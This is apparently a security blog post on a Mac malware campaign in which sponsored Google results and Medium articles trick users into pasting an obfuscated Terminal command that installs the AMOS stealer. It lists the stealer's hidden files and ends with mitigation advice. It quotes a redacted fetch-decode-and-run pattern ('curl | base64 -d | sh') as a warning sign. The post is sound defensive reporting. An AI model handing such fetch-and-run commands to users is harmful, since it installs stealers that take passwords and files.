More Mac malware from Google search

Published: (February 8, 2026 at 03:52 PM EST)
3 min read

Source: Hacker News

Background

Little more than a month after I reported that Google’s AI was offering links to malicious scripts, the problem has resurfaced with a slight twist. I’m grateful to Olena of Clario for alerting me to a new campaign delivering the AMOS (alias SOMA) stealer to Macs. Vladyslav Kolchin describes the campaign in his blog post.

Campaign Details

Vladyslav discovered the malicious pages on forged Apple‑like sites linked from docs.google.com, business.google.com, and on articles posted on Medium. One of the pages appeared at the top of Google’s sponsored results when searching for

how to clear cache on macos tahoe

The search result led to a Medium article by “Clear Mareks”, which used the familiar ploy of asking users to paste a malicious command into Terminal.

Medium screenshot 1

A second variant mimicked an official Apple Support page, though the impersonation was obvious.

Medium screenshot 2

The attack is almost identical to the previous ChatGPT‑based campaign, including similar Base‑64 obfuscation.

Medium screenshot 3

Indicators of Compromise

The payload downloaded and executed an AMOS stealer, which, unusually, ran without issue inside a locked‑down virtual machine.

Medium screenshot 4

The stealer immediately began copying the contents of the Documents folder to a hidden directory named FileGrabber and created several hidden files in the home folder:

  • .agent – an AppleScript that initiates the theft
  • .mainHelper – the main Mach‑O binary
  • .pass – a plain‑text file containing the user’s password

These files match those observed in the AMOS version delivered via last year’s ChatGPT deception. In addition to Documents, the malware also requested access to Notes.

AITRAP screenshot

Malware Behavior

The malicious command was heavily obfuscated, but a quick inspection reveals the use of curl, a common tool for fetching payloads without attaching quarantine attributes.

curl  | base64 -d | sh

Because the rest of the script was Base‑64 encoded, the true intent was hidden, yet the presence of curl should have raised immediate suspicion.

Mitigation Recommendations

  1. Treat search‑engine results critically – promoted links are often paid placements; consider the motive (money) before clicking.
  2. Verify the provenance of the destination – ensure the URL belongs to a reputable Mac‑focused site.
  3. Never follow shortened links without expanding them – use a utility such as Link Unshortener from the App Store.
  4. Do not run commands from untrusted sources – only execute Terminal commands that come from reputable, fully explained sources.
  5. Inspect scripts before execution – look for suspicious patterns (e.g., curl pipelines, Base‑64 blobs).
  6. Enable Gatekeeper and XProtect – while they cannot stop a user‑initiated bypass, they add layers of protection against inadvertent execution.

Why macOS Can’t Stop This

macOS security mechanisms (Gatekeeper, XProtect, quarantine attributes) are effective when software is launched through normal channels. In this case, the user is deliberately tricked into bypassing those protections by pasting an obfuscated command into Terminal. curl is a legitimate tool, and when used by an attacker it can fetch payloads without triggering quarantine. Ultimately, the chain of trust is broken by the user’s actions, not by a flaw in the operating system.

Stay vigilant, verify sources, and avoid running unknown commands.

0 views
Back to Blog

Related posts

Read more »